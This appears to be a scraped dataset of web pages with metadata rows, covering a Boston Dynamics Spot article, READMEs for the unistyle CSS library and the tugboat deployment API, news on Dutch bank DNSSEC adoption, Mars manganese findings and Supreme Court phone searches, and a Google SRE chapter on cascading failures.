The video was posted by Steve Jurvetson, a partner at VC firm DFJ. “I was told that this is the only Spot (their latest robot) in civilian hands,” Jurvetson told *IEEE Spectrum*. (Arguably, the new ATLAS is Boston Dynamics’ latest robot.) Jurvetson was really impressed by the robot’s “lifelike movement.” He added: “And the tradition of the uncanny valley continues . . . To the **un-canine valley**!”
As for Spot, we know that the U.S. Marines were using it as a recon robot late last year but the future of that program is unclear, according to a report from Military.com:
“I see Spot right now as more of a ground reconnaissance asset,” said Capt. James Pineiro, the Ground Combat Element branch head for the Warfighting Lab. “The problem is, Spot in its current configuration doesn't have the autonomy to do that. It has the ability to walk in its environment, but it's completely controller-driven.”
For now, both Spot and LS3 are in storage, with no future experiments or upgrades planned. Pineiro said it would take a new contract and some new interest from Marine Corps top brass to resurrect the program.
For the life of me I don’t know how anyone can **not** be interested in Spot. Here’s one more video from Jurvetson; it’s a lot of fun to see the robot just being played with in a completely unstructured way:
*Updated 2/29/16 9:20 pm ET: Added comments from Steve Jurvetson. Updated 3/1/16 2 pm ET: Corrected name of Andy Rubin’s dog. Erico Guizzo contributed reporting.*
Evan Ackerman is a senior editor at *IEEE Spectrum*. Since 2007, he has written over 6,000 articles on robotics and technology. He has a degree in Martian geology and is excellent at playing bagpipes.
| true | true | true |
Boston Dynamics' dog Spot meets Andy Rubin's dog Alex
|
2024-10-12 00:00:00
|
2016-02-29 00:00:00
|
article
|
ieee.org
|
IEEE Spectrum
| null | null |
|
27,913,942 |
https://fake-handwriting.herokuapp.com/
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
10,182,857 |
https://github.com/joakimbeng/unistyle
|
GitHub - joakimbeng/unistyle: Write modular and scalable CSS using the next version of ECMAScript
|
Joakimbeng
|
Write modular and scalable CSS using the next version of ECMAScript.
Using ES2015 (and some ES2016) features to write CSS in JavaScript makes it really modular, scalable and gives you in practice all the features of a good CSS pre- or postprocessor, without resorting to a new language. See the example section for use together with React for how to avoid the annoying cascading feature of CSS, which is troublesome in large scale CSS.
The name is an abbreviation of Uniform Stylesheets. It is also somewhat related to Universal JavaScript or what you want to call it, because of the ability to share the same CSS code written in JavaScript between your frontend component's inline styles and the application's complete CSS.
Install `unistyle`
using npm:
`npm install --save unistyle`
```
$> unistyle --help
Write modular and scalable CSS using the next version of ECMAScript.
Usage:
unistyle [options] <path to module>
Options:
-o, --output Output compiled CSS to specified file instead of to stdout [string]
-h, --help Show help [boolean]
-v, --version Show version number [boolean]
Examples:
unistyle -o app.css src/styles.js Compile src/styles.js to app.css
```
**Note:** All examples below assumes you're already using Babel in your project. Or perhaps `unistyle-loader`
together with a Babel loader and Webpack.
The examples source code can be found in `./examples`
and their compiled counterparts in `./examples-es5`
.
*You can use either CommonJS modules or the new ES2015 modules syntax.*
In `examples/vars/vars.js`
:
```
export const padding = '15px';
export const dark = '#333';
```
In `examples/vars/button.js`
:
```
import {padding, dark} from './vars';
export default {
'.btn': {
padding,
border: `1px solid ${dark}`
}
};
```
In `examples/vars/index.js`
:
```
import {padding} from './vars';
import button from './button';
export default {
body: {
padding
},
...button
};
```
Compiling to CSS with `unistyle examples-es5/vars`
will give the following result:
```
body, .btn {
padding: 15px;
}
.btn {
border: 1px solid #333;
}
```
*Every preprocessor I can think of (e.g. LESS, Sass and Stylus) have the ability to extend one CSS declaration with another, for reusability. They all have their own syntax, however with Unistyle you can use the object rest spread syntax (which you should already be using if Babel is your thing):*
In `examples/extend/common.js`
:
```
export const bigAndPadded = {
fontSize: 100,
padding: 50
};
```
In `examples/extend/button.js`
:
```
import {bigAndPadded} from './common';
export default {
button: {
...bigAndPadded,
border: '5px solid black'
}
};
```
Compiling to CSS with `unistyle examples-es5/extend/button`
will give the following:
```
button {
font-size: 100px;
padding: 50px;
border: 5px solid black;
}
```
*Using media queries (which bubbles up to the root) is easier then ever using the computed property names syntax:*
In `examples/mediaqueries/breakpoints.js`
:
```
export const palm = '@media only screen and (max-width: 700px)';
export const small = '@media only screen and (max-width: 1000px)';
```
In `examples/mediaqueries/index.js`
:
```
import {palm} from './breakpoints';
export default {
body: {
fontSize: 20,
[palm]: {
fontSize: 16
}
}
};
```
Compiling with `unistyle examples-es5/mediaqueries`
will give:
```
body {
font-size: 20px;
}
@media only screen and (max-width: 700px) {
body {
font-size: 16px;
}
}
```
You can specify multiple `@font-face`
declarations using arrays.
In `examples/font-faces/index.js`
:
```
export default {
'@font-face': [
font('my-web-font', 'webfont'),
font('my-other-font', 'otherfont')
]
};
function font(family, filename) {
return {
fontFamily: `"${family}"`,
src: [
`url("${filename}.eot")`,
[
`url("${filename}.eot?#iefix") format("embedded-opentype")`,
`url("${filename}.woff2") format("woff2")`,
`url("${filename}.woff") format("woff")`,
`url("${filename}.ttf") format("truetype")`,
`url("${filename}.svg?#svgFontName") format("svg")`
].join(', ')
]
};
}
```
Compiling with `unistyle examples-es5/font-faces`
will give:
```
@font-face {
font-family: "my-web-font";
src: url("webfont.eot");
src: url("webfont.eot?#iefix") format("embedded-opentype"), url("webfont.woff2") format("woff2"), url("webfont.woff") format("woff"), url("webfont.ttf") format("truetype"), url("webfont.svg?#svgFontName") format("svg");
}
@font-face {
font-family: "my-other-font";
src: url("otherfont.eot");
src: url("otherfont.eot?#iefix") format("embedded-opentype"), url("otherfont.woff2") format("woff2"), url("otherfont.woff") format("woff"), url("otherfont.ttf") format("truetype"), url("otherfont.svg?#svgFontName") format("svg");
}
```
A CSS module written for Unistyle is already compatible with React inline styles, so you could just `import`
/`require`
it like so:
In `examples/react/inline/button-style.js`
:
```
export default {
padding: 15,
border: '2px solid black'
};
```
In `examples/react/inline/button.js`
:
```
import React from 'react';
import buttonStyle from './button-style';
export default class Button extends React.Component {
render() {
return <button style={buttonStyle}>My button</button>;
}
}
```
No compilation step is needed here...
*Note: this is not limited to React but works with almost any frontend framework/library, if you're using Browserify, Webpack or similar.*
Using the modules `cngen`
and `classnameify`
respectively makes it possible to keep all CSS for your React components in its own file. As a bonus you get round the biggest problem with large scale CSS, i.e. the fact that it cascades.
In `examples/react/separate/button-style.js`
:
```
export default {
'padding': 15,
'border': '2px solid black',
':hover': {
borderColor: 'green'
}
};
```
In `examples/react/separate/button.js`
:
```
import React from 'react';
import cngen from 'cngen';
import buttonStyle from './button-style';
export default class Button extends React.Component {
render() {
const buttonClass = cngen(buttonStyle);
return <button className={buttonClass}>My button</button>;
}
}
```
In `examples/react/separate/styles.js`
:
```
import classnameify from 'classnameify';
import buttonStyle from './button-style';
export default classnameify({
buttonStyle
});
```
Compiling to CSS with `unistyle examples-es5/react/separate/styles.js`
, gives the following CSS:
```
._cf2b82a {
padding: 15px;
border: 2px solid black;
}
._cf2b82a:hover {
border-color: green;
}
```
### Publishing Unistyle modules to npm
Because Unistyle CSS modules are JavaScript only, they are easily reused if you publish them to npm after which they can be installed and imported/required. Babel module best practices still applies though, i.e. you should transpile your code before publishing.
When publishing a Unistyle CSS module to `npm`
I recommend adding `"unistyle"`
as a keyword in your `package.json`
for easier discoverability.
When adding third party modules to your app's Unistyle CSS you should export an array instead of an object, for instance with `normalize-unistyle`
:
```
import normalize from 'normalize-unistyle';
import myStyles from './my-styles';
export default [
normalize,
myStyles
];
```
This is to have colliding selectors in `normalize-unistyle`
and `myStyles`
merged instead of overwritten.
E.g. compiling this (`examples/third-party/object.js`
):
```
const thirdParty = {
body: {
color: 'black'
}
};
const myStyles = {
body: {
backgroundColor: 'white'
}
};
export default {
...thirdParty,
...myStyles
};
```
Will yield the *unexpected* result:
```
body {
background-color: white;
}
```
And instead compiling this (`examples/third-party/array.js`
):
```
const thirdParty = {
body: {
color: 'black'
}
};
const myStyles = {
body: {
backgroundColor: 'white'
}
};
export default [
thirdParty,
myStyles
];
```
Will yield the *expected* result:
```
body {
color: black;
background-color: white;
}
```
Use existing modules for this.
### Using `cssmin`
for minification
`npm install --save unistyle cssmin`
Then you can add a `build`
script to `package.json`
like so:
```
{
"scripts": {
"build": "unistyle styles/ | cssmin > styles.min.css"
}
}
```
And then run: `npm run build`
to create `styles.min.css`
.
### Using `autoprefixer`
for prefixing
`npm install --save unistyle postcss-cli autoprefixer`
Then you can add a `build`
script to `package.json`
like so:
```
{
"scripts": {
"build": "unistyle styles/ | postcss --use autoprefixer -o styles.css"
}
}
```
And then run: `npm run build`
to create `styles.css`
.
~~Unistyle uses Babel and AbsurdJS~~ under the hood. Unistyle does not use Babel or AbsurdJS anymore. It's up to you to use Babel if you want to, or stick with the ES2015 features currently in Node v4 or v5. Instead of AbsurdJS Unistyle uses `unistyle-flat`
to allow nesting of styles and `to-css`
to compile to CSS. This is because AbsurdJS had so many more features than are actually needed which makes Unistyle less magical now.
Unistyle also uses `kebab-case`
and `pixelify`
to be able to write CSS properties in camelCase (to lessen the need for quotes) and to append values with `'px'`
when appropriate, i.e. `{fontSize: 10} => font-size: 10px;`
. This makes your Unistyle modules compatible with React inline styles.
**Note:** `to-css`
's feature to set a property multiple times should not be used in your inline styles and only in your compiled stylesheet.
Name | Type | Description |
---|---|---|
obj | `Object | Array` |
Returns: `Promise`
, which resolves to the compiled CSS string.
MIT @ Joakim Carlstein
| true | true | true |
Write modular and scalable CSS using the next version of ECMAScript - joakimbeng/unistyle
|
2024-10-12 00:00:00
|
2015-09-03 00:00:00
|
https://opengraph.githubassets.com/9ad7623d6ef8f97be9349fc7847e45e51876ca5c13de4128958467404b78f8bf/joakimbeng/unistyle
|
object
|
github.com
|
GitHub
| null | null |
7,305,206 |
https://github.com/remind101/shipr
|
GitHub - remind101/tugboat: Rest API and AngularJS client for deploying github repos.
|
Remind
|
Tugboat is an API and AngularJS client for aggregating deployments of GitHub repos.
Tugboat by itself isn't all that exciting; it won't perform deployments for you, but it does provide an API for deployment providers to hook into.
Writing your own providers is really simple and you can write them in any language that you want.
Tugboat exposes an API for registering deployments, add logs, and updating the status. For an example of how to create an external provider with Go, see provider_test.go.
The API expects the `user`
part of a basic auth `Authorization`
header to be a provider auth token. You can generate a provider auth token using the following:
```
$ tugboat tokens create <provider>
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJQcm92aWRlciI6ImZvbyJ9.UYMrZD7cgBdeEXLf11nwEiZpUI2DuOdRsGOZyG2SluU
```
Creates a new Deployment within tugboat. In general, this would include a post body extracted from a GitHub `deployment`
event webhook payload.
The response from this endpoint will be a `Deployment`
resource.
```
POST /deployments
```
**Example Request**
```
{
"ID": 1234,
"Sha": "abcd...xyz",
"Ref": "master"
}
```
**Example Response**
```
{
"ID": "01234567-89ab-cdef-0123-456789abcdef",
"Repo": "remind101/r101-api",
"Token": "01234567-89ab-cdef-0123-456789abcdef"
}
```
This adds lines of logs to the deployment. You can simply stream your logs and they will be added as they come in. Logs show up automatically in the UI via pusher events.
```
POST /deployments/:id/logs
```
**Example Request**
```
Authorization: dXNlcjo=\n
Deploying to production
Deployed
```
Updates the status of the deployment. The `status`
field should be one of `succeeded`
, `failed`
or `errored`
. If the `status`
is `errored`
then you can provide an `error`
field with details about the error. This will also update the status of the deployment within GitHub itself.
```
POST /deployments/:id/status
```
**Example Request**
```
{
"status": "succeeded"
}
```
- Git clone this repo into
`$GOPATH/src/github.com/remind101/tugboat`
- Run the
`before_install`
steps in`.travis.yml`
to set up dependencies and env. - Run the
`script`
steps in`.travis.yml`
to test your setup.
| true | true | true |
Rest API and AngularJS client for deploying github repos. - remind101/tugboat
|
2024-10-12 00:00:00
|
2013-04-29 00:00:00
|
https://opengraph.githubassets.com/0565d8388046032fdbcb9e3c3d891452f8de5138d9b2708406ac3fac492e4816/remind101/tugboat
|
object
|
github.com
|
GitHub
| null | null |
39,986,479 |
https://blogs-cloud-updates-1.greptime-website.pages.dev/blogs/
|
Greptime Blog | Cloud-scale, Fast and Efficient Time Series Data Infrastructure
|
Sunng
|
Engineering
• May 12, 2023
### How Out-of-Order Data is Handled in Time-series Databases
Time-series databases are domain-specific databases. Ideally, we assume that data is written in real-time and in a sequential manner. However, in the real world, the situations are often more complex. Data may be out of order due to sensor failures, network latency, power outage,etc, posing challenges to time-series databases. In this article, we dive into the impact of out-of-order data in time-series databases and learn how to optimize its handling.
| true | true | true |
Greptime Blog
|
2024-10-12 00:00:00
|
2024-04-11 00:00:00
|
website
|
greptime.com
|
greptime.com
| null | null |
|
13,704,161 |
https://www.theregister.co.uk/2017/02/22/dutch_banking_industry_security_bad/
|
How's your online bank security looking? The Dutch studied theirs and... yeah, not great
|
Kieren McCarthy
|
This article is more than **1 year old**
# How's your online bank security looking? The Dutch studied theirs and... yeah, not great
## Just six per cent of banks using DNSSEC on domains
The Dutch banking industry is doing a terrible job of online security, according to the company that runs the country's .nl internet domains.
In a new report published Tuesday, the internet registry SIDN was surprised to find that just six per cent of banks using .nl internet addresses have the security protocol DNSSEC in place to protect their digital assets and their customers.
"Banks should be the main users of DNSSEC security," said SIDN CEO Roelof Meijer, "but they scored – for the second time in a row – the worst of all investigated domains."
He also pointed out that with online banking becoming ever more important, it was contingent on the industry to adopt the latest security standards. "With the closing of physical bank branches and a reduction in the number of ATMs, the online front door of the banks is becoming increasingly important," said Meijer. "Moreover, of all companies, they suffer the most from phishing and spoofing, something DNSSEC in conjunction with DKIM and DMARC can protect against."
SIDN looked at just over 7,000 .nl domains owned by a range of industries from government to business to banking and telecoms to determine whether they were using the security protocol.
Top of the list, unsurprisingly, came the internet infrastructure industry, with 64 per cent of internet addresses secured by DNSSEC. But government came an impressive second with 59 per cent – something SIDN says is a direct result of policy.
### DKIM Dotcom
Last year, the Dutch interior minister directed all local government websites to adopt DNSSEC by the end of 2017, and new security standards that build on top of DNSSEC for email (STARTTLS and DKIM) have also encouraged take-up.
Business has a passable take-up of 30 per cent (up from 23 per cent in 2014) and the internet/telecom industry was surprisingly low with just 25 per cent take-up.
While there has been a significant pick-up in the use of DNSSEC, it is still below what internet engineers want to see – although it is still doing much better than IPv6.
If a domain name is secured with DNSSEC it makes it much harder for criminals to misdirect people to a different address, as the DNS system itself checks on its validity.
The technology has been a long time coming and was, initially at least, very expensive and complicated to install. It is still far from simple or cheap, but internet infrastructure companies have been working with it for some time, and most recently ICANN determined that all new internet registries would have to work with DNSSEC, giving the protocol a boost.
Partly as a result of the recent take-up, DNSSEC has started to become a foundation on which other applications are being built, securing both communications and email: examples being DKIM, SPF, DANE and DMARC.
"It's hard to think of any good reason for not implementing DNSSEC protection," Meijer argued. "We believe that it's now up to the big internet service providers to act." ®
14
| true | true | true |
Just six per cent of banks using DNSSEC on domains
|
2024-10-12 00:00:00
|
2017-02-22 00:00:00
| null |
article
|
theregister.com
|
The Register
| null | null |
7,673,986 |
http://arstechnica.com/tech-policy/2014/04/scotus-struggles-to-find-a-search-and-seizure-rule-for-the-digital-age/
|
SCOTUS struggles to find a search and seizure rule for the digital age
|
Joe Silver
|
The US Supreme Court justices heard oral arguments on Tuesday morning in two companion cases revolving around whether police officers need a warrant to search a suspect's cell phone upon arrest: *United States v. Wurie* involves an old-fashioned flip-phone, while *Riley v. California* centers on a modern smartphone.
The specific issue before the court in *Riley* is currently the more interesting debate. Does an arrest alone allow a police officer to search the vast troves of data available on a person's smartphone? In David Riley's case, his phone held a potentially incriminating photo: Riley was standing next to a red Oldsmobile allegedly involved in a prior shooting, but the car was not directly connected to the reason for Riley’s current arrest.
So during two spirited hours today, justices and counsel alike name-dropped a host of technologies and digital platforms, including Twitter, Facebook, Fitbits, GPS, airplane mode, Faraday bags, encryption, online dating apps, and several others in an effort to craft what amounts to an appropriate search and seizure rule for the digital age. And while justices appeared all too willing to try to strut their technological proficiency—some more successfully than others—the task at hand was to determine whether warrantless searches of cell phones and other devices in a suspect’s proximity "incident to arrest" are acceptable under the US Constitution’s Fourth Amendment, which forbids “unreasonable” searches and seizures.
## New rule for a new world
Most of the justices during the *Riley *argument appeared to agree that computers have changed the world to such an extent that a new computer-specific rule is now necessary for searches incident to arrest. They seemed to further agree that police should not have unfettered access to all of the information on one’s cell phone just because it is on one's person during an arrest.
| true | true | true |
Pair of justices lean toward always requiring a warrant; most want a middle ground.
|
2024-10-12 00:00:00
|
2014-04-29 00:00:00
|
article
|
arstechnica.com
|
Ars Technica
| null | null |
|
40,223,457 |
https://discover.lanl.gov/news/0501-ancient-mars/
|
New findings point to an Earth-like environment on ancient Mars
|
Los Alamos National Laboratory
|
A research team using the ChemCam instrument onboard NASA’s Curiosity rover discovered higher-than-usual amounts of manganese in lakebed rocks within Gale Crater on Mars, which indicates that the sediments were formed in a river, delta, or near the shoreline of an ancient lake. The results were published today in Journal of Geophysical Research: Planets.
“It is difficult for manganese oxide to form on the surface of Mars, so we didn’t expect to find it in such high concentrations in a shoreline deposit,” said Patrick Gasda, of Los Alamos National Laboratory’s Space Science and Applications group and lead author on the study. “On Earth, these types of deposits happen all the time because of the high oxygen in our atmosphere produced by photosynthetic life, and from microbes that help catalyze those manganese oxidation reactions.
“On Mars, we don’t have evidence for life, and the mechanism to produce oxygen in Mars’s ancient atmosphere is unclear, so how the manganese oxide was formed and concentrated here is really puzzling. These findings point to larger processes occurring in the Martian atmosphere or surface water and shows that more work needs to be done to understand oxidation on Mars,” Gasda added.
ChemCam, which was developed at Los Alamos and CNES (the French space agency), uses a laser to form a plasma on the surface of a rock, and collects that light in order to quantify elemental composition in rocks.
The sedimentary rocks explored by the rover are a mix of sands, silts, and muds. The sandy rocks are more porous, and groundwater can more easily pass through sands compared to the muds that make up most of the lakebed rocks in the Gale Crater. The research team looked at how manganese could have been enriched in these sands—for example, by percolation of groundwater through the sands on the shore of a lake or mouth of a delta—and what oxidant could be responsible for the precipitation of manganese in the rocks.
On Earth, manganese becomes enriched because of oxygen in the atmosphere, and this process is often sped up by the presence of microbes. Microbes on Earth can use the many oxidation states of manganese as energy for metabolism; if life was present on ancient Mars, the increased amounts of manganese in these rocks along the lake shore would have been a helpful energy source for life.
“The Gale lake environment, as revealed by these ancient rocks, gives us a window into a habitable environment that looks surprisingly similar to places on Earth today,” said Nina Lanza, principal investigator for the ChemCam instrument. “Manganese minerals are common in the shallow, oxic waters found on lake shores on Earth, and it's remarkable to find such recognizable features on ancient Mars.”
**Paper**: “Manganese-rich sandstones as an indicator of ancient oxic lake water conditions in Gale Crater, Mars” Journal of Geophysical Research: Planets.
**Funding**: NASA Jet Propulsion Laboratory
| true | true | true |
Manganese-rich sandstones indicate there were once habitable conditions in the Gale Crater
|
2024-10-12 00:00:00
|
2024-05-01 00:00:00
|
website
|
lanl.gov
|
Los Alamos National Laboratory
| null | null |
|
35,717,443 |
https://github.com/kovidgoyal/kitty/issues/2701
| null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
40,278,452 |
https://sre.google/sre-book/addressing-cascading-failures/#xref_cascading-failure_load-shed-graceful-degredation
|
Addressing Cascading Failures
|
Mike Ulrich
|
# Addressing Cascading Failures
If at first you don't succeed, back off exponentially.
Why do people always forget that you need to add a little jitter?
A cascading failure is a failure that grows over time as a result of positive feedback.107 It can occur when a portion of an overall system fails, increasing the probability that other portions of the system fail. For example, a single replica for a service can fail due to overload, increasing load on remaining replicas and increasing their probability of failing, causing a domino effect that takes down all the replicas for a service.
We’ll use the Shakespeare search service discussed in Shakespeare: A Sample Service as an example throughout this chapter. Its production configuration might look something like Figure 22-1.
# Causes of Cascading Failures and Designing to Avoid Them
Well-thought-out system design should take into account a few typical scenarios that account for the majority of cascading failures.
## Server Overload
The most common cause of cascading failures is overload. Most cascading failures described here are either directly due to server overload, or due to extensions or variations of this scenario.
Suppose the frontend in cluster A is handling 1,000 requests per second (QPS), as in Figure 22-2.
If cluster B fails (Figure 22-3), requests to cluster A increase to 1,200 QPS. The frontends in A are not able to handle requests at 1,200 QPS, and therefore start running out of resources, which causes them to crash, miss deadlines, or otherwise misbehave. As a result, the rate of successfully handled requests in A dips well below 1,000 QPS.
This reduction in the rate of useful work being done can spread into other failure domains, potentially spreading globally. For example, local overload in one cluster may lead to its servers crashing; in response, the load balancing controller sends requests to other clusters, overloading their servers, leading to a service-wide overload failure. It may not take long for these events to transpire (e.g., on the order of a couple minutes), because the load balancer and task scheduling systems involved may act very quickly.
## Resource Exhaustion
Running out of a resource can result in higher latency, elevated error rates, or the substitution of lower-quality results. These are in fact desired effects of running out of resources: something eventually needs to give as the load increases beyond what a server can handle.
Depending on what resource becomes exhausted in a server and how the server is built, resource exhaustion can render the server less efficient or cause the server to crash, prompting the load balancer to distribute the resource problems to other servers. When this happens, the rate of successfully handled requests can drop and possibly send the cluster or an entire service into a cascade failure.
Different types of resources can be exhausted, resulting in varying effects on servers.
### CPU
If there is insufficient CPU to handle the request load, typically all requests become slower. This scenario can result in various secondary effects, including the following:
- Increased number of in-flight requests
- Because requests take longer to handle, more requests are handled concurrently (up to a possible maximum capacity at which queuing may occur). This affects almost all resources, including memory, number of active threads (in a thread-per-request server model), number of file descriptors, and backend resources (which in turn can have other effects).
- Excessively long queue lengths
- If there is insufficient capacity to handle all the requests at steady state, the server will saturate its queues. This means that latency increases (the requests are queued for longer amounts of time) and the queue uses more memory. See Queue Management for a discussion of mitigation strategies.
- Thread starvation
- When a thread can’t make progress because it’s waiting for a lock, health checks may fail if the health check endpoint can’t be served in time.
- CPU or request starvation
- Internal watchdogs
108in the server detect that the server isn’t making progress, causing the servers to crash due to CPU starvation, or due to request starvation if watchdog events are triggered remotely and processed as part of the request queue. - Missed RPC deadlines
- As a server becomes overloaded, its responses to RPCs from its clients arrive later, which may exceed any deadlines those clients set. The work the server did to respond is then wasted, and clients may retry the RPCs, leading to even more overload.
- Reduced CPU caching benefits
- As more CPU is used, the chance of spilling on to more cores increases, resulting in decreased usage of local caches and decreased CPU efficiency.
### Memory
If nothing else, more in-flight requests consume more RAM from allocating the request, response, and RPC objects. Memory exhaustion can cause the following effects:
- Dying tasks
- For example, a task might be evicted by the container manager (VM or otherwise) for exceeding available resource limits, or application-specific crashes may cause tasks to die.
- Increased rate of garbage collection (GC) in Java, resulting in increased CPU usage
- A vicious cycle can occur in this scenario: less CPU is available, resulting in slower requests, resulting in increased RAM usage, resulting in more GC, resulting in even lower availability of CPU. This is known colloquially as the “GC death spiral.”
- Reduction in cache hit rates
- Reduction in available RAM can reduce application-level cache hit rates, resulting in more RPCs to the backends, which can possibly cause the backends to become overloaded.
### Threads
Thread starvation can directly cause errors or lead to health check failures. If the server adds threads as needed, thread overhead can use too much RAM. In extreme cases, thread starvation can also cause you to run out of process IDs.
### File descriptors
Running out of file descriptors can lead to the inability to initialize network connections, which in turn can cause health checks to fail.
### Dependencies among resources
Note that many of these resource exhaustion scenarios feed from one another—a service experiencing overload often has a host of secondary symptoms that can look like the root cause, making debugging difficult.
For example, imagine the following scenario:
- A Java frontend has poorly tuned garbage collection (GC) parameters.
- Under high (but expected) load, the frontend runs out of CPU due to GC.
- CPU exhaustion slows down completion of requests.
- The increased number of in-progress requests causes more RAM to be used to process the requests.
- Memory pressure due to requests, in combination with a fixed memory allocation for the frontend process as a whole, leaves less RAM available for caching.
- The reduced cache size means fewer entries in the cache, in addition to a lower hit rate.
- The increase in cache misses means that more requests fall through to the backend for servicing.
- The backend, in turn, runs out of CPU or threads.
- Finally, the lack of CPU causes basic health checks to fail, starting a cascading failure.
In situations as complex as the preceding scenario, it’s unlikely that the causal chain will be fully diagnosed during an outage. It might be very hard to determine that the backend crash was caused by a decrease in the cache rate in the frontend, particularly if the frontend and backend components have different owners.
## Service Unavailability
Resource exhaustion can lead to servers crashing; for example, servers might crash when too much RAM is allocated to a container. Once a couple of servers crash on overload, the load on the remaining servers can increase, causing them to crash as well. The problem tends to snowball and soon all servers begin to crash-loop. It’s often difficult to escape this scenario because as soon as servers come back online they’re bombarded with an extremely high rate of requests and fail almost immediately.
For example, if a service was healthy at 10,000 QPS, but started a cascading failure due to crashes at 11,000 QPS, dropping the load to 9,000 QPS will almost certainly not stop the crashes. This is because the service will be handling increased demand with reduced capacity; only a small fraction of servers will usually be healthy enough to handle requests. The fraction of servers that will be healthy depends on a few factors: how quickly the system is able to start the tasks, how quickly the binary can start serving at full capacity, and how long a freshly started task is able to survive the load. In this example, if 10% of the servers are healthy enough to handle requests, the request rate would need to drop to about 1,000 QPS in order for the system to stabilize and recover.
Similarly, servers can appear unhealthy to the load balancing layer, resulting in reduced load balancing capacity: servers may go into “lame duck” state (see A Robust Approach to Unhealthy Tasks: Lame Duck State) or fail health checks without crashing. The effect can be very similar to crashing: more servers appear unhealthy, the healthy servers tend to accept requests for a very brief period of time before becoming unhealthy, and fewer servers participate in handling requests.
Load balancing policies that avoid servers that have served errors can exacerbate problems further—a few backends serve some errors, so they don’t contribute to the available capacity for the service. This increases the load on the remaining servers, starting the snowball effect.
# Preventing Server Overload
The following list presents strategies for avoiding server overload in rough priority order:
- Load test the server’s capacity limits, and test the failure mode for overload
- This is the most important exercise you should conduct in order to prevent server overload. Unless you test in a realistic environment, it’s very hard to predict exactly which resource will be exhausted and how that resource exhaustion will manifest. For details, see Testing for Cascading Failures.
- Serve degraded results
- Serve lower-quality, cheaper-to-compute results to the user. Your strategy here will be service-specific. See Load Shedding and Graceful Degradation.
- Instrument the server to reject requests when overloaded
- Servers should protect themselves from becoming overloaded and crashing. When overloaded at either the frontend or backend layers, fail early and cheaply. For details, see Load Shedding and Graceful Degradation.
- Instrument higher-level systems to reject requests, rather than overloading servers
- Note that because rate limiting often doesn’t take overall service health into account, it may not be able to stop a failure that has already begun. Simple rate-limiting implementations are also likely to leave capacity unused. Rate limiting can be implemented in a number of places:
-
*At the reverse proxies*, by limiting the volume of requests by criteria such as IP address to mitigate attempted denial-of-service attacks and abusive clients.*At the load balancers*, by dropping requests when the service enters global overload. Depending on the nature and complexity of the service, this rate limiting can be indiscriminate (“drop all traffic above X requests per second”) or more selective (“drop requests that aren’t from users who have recently interacted with the service” or “drop requests for low-priority operations like background synchronization, but keep serving interactive user sessions”).*At individual tasks*, to prevent random fluctuations in load balancing from overwhelming the server.
- Perform capacity planning
- Good capacity planning can reduce the probability that a cascading failure will occur. Capacity planning should be coupled with performance testing to determine the load at which the service will fail. For instance, if every cluster’s breaking point is 5,000 QPS, the load is evenly spread across clusters,
109and the service’s peak load is 19,000 QPS, then approximately six clusters are needed to run the service at*N*+ 2.
Capacity planning reduces the probability of triggering a cascading failure, but it is not sufficient to protect the service from cascading failures. When you lose major parts of your infrastructure during a planned or unplanned event, no amount of capacity planning may be sufficient to prevent cascading failures. Load balancing problems, network partitions, or unexpected traffic increases can create pockets of high load beyond what was planned. Some systems can grow the number of tasks for your service on demand, which may prevent overload; however, proper capacity planning is still needed.
## Queue Management
Most thread-per-request servers use a queue in front of a thread pool to handle requests. Requests come in, they sit on a queue, and then threads pick requests off the queue and perform the actual work (whatever actions are required by the server). Usually, if the queue is full, the server will reject new requests.
If the request rate and latency of a given task is constant, there is no reason to queue requests: a constant number of threads should be occupied. Under this idealized scenario, requests will only be queued if the steady state rate of incoming requests exceeds the rate at which the server can process requests, which results in saturation of both the thread pool and the queue.
Queued requests consume memory and increase latency. For example, if the queue size is 10x the number of threads, the time to handle the request on a thread is 100 milliseconds. If the queue is full, then a request will take 1.1 seconds to handle, most of which time is spent on the queue.
For a system with fairly steady traffic over time, it is usually better to have small queue lengths relative to the thread pool size (e.g., 50% or less), which results in the server rejecting requests early when it can’t sustain the rate of incoming requests. For example, Gmail often uses queueless servers, relying instead on failover to other server tasks when the threads are full. On the other end of the spectrum, systems with “bursty” load for which traffic patterns fluctuate drastically may do better with a queue size based on the current number of threads in use, processing time for each request, and the size and frequency of bursts.
## Load Shedding and Graceful Degradation
*Load shedding* drops some proportion of load by dropping traffic as the server approaches overload conditions. The goal is to keep the server from running out of RAM, failing health checks, serving with extremely high latency, or any of the other symptoms associated with overload, while still doing as much useful work as it can.
One straightforward way to shed load is to do per-task throttling based on CPU, memory, or queue length; limiting queue length as discussed in Queue Management is a form of this strategy. For example, one effective approach is to return an HTTP 503 (service unavailable) to any incoming request when there are more than a given number of client requests in flight.
Changing the queuing method from the standard *first-in, first-out* (FIFO) to *last-in, first-out* (LIFO) or using the *controlled delay* (CoDel) algorithm [Nic12] or similar approaches can reduce load by removing requests that are unlikely to be worth processing [Mau15]. If a user’s web search is slow because an RPC has been queued for 10 seconds, there’s a good chance the user has given up and refreshed their browser, issuing another request: there’s no point in responding to the first one, since it will be ignored! This strategy works well when combined with propagating RPC deadlines throughout the stack, described in Latency and Deadlines.
More sophisticated approaches include identifying clients to be more selective about what work is dropped, or picking requests that are more important and prioritizing. Such strategies are more likely to be needed for shared services.
*Graceful degradation* takes the concept of load shedding one step further by reducing the amount of work that needs to be performed. In some applications, it’s possible to significantly decrease the amount of work or time needed by decreasing the quality of responses. For instance, a search application might only search a subset of data stored in an in-memory cache rather than the full on-disk database or use a less-accurate (but faster) ranking algorithm when overloaded.
When evaluating load shedding or graceful degradation options for your service, consider the following:
- Which metrics should you use to determine when load shedding or graceful degradation should kick in (e.g,. CPU usage, latency, queue length, number of threads used, whether your service enters degraded mode automatically or if manual intervention is necessary)?
- What actions should be taken when the server is in degraded mode?
- At what layer should load shedding and graceful degradation be implemented? Does it make sense to implement these strategies at every layer in the stack, or is it sufficient to have a high-level choke-point?
As you evaluate options and deploy, keep the following in mind:
- Graceful degradation shouldn’t trigger very often—usually in cases of a capacity planning failure or unexpected load shift. Keep the system simple and understandable, particularly if it isn’t used often.
- Remember that the code path you never use is the code path that (often) doesn’t work. In steady-state operation, graceful degradation mode won’t be used, implying that you’ll have much less operational experience with this mode and any of its quirks, which
*increases*the level of risk. You can make sure that graceful degradation stays working by regularly running a small subset of servers near overload in order to exercise this code path. - Monitor and alert when too many servers enter these modes.
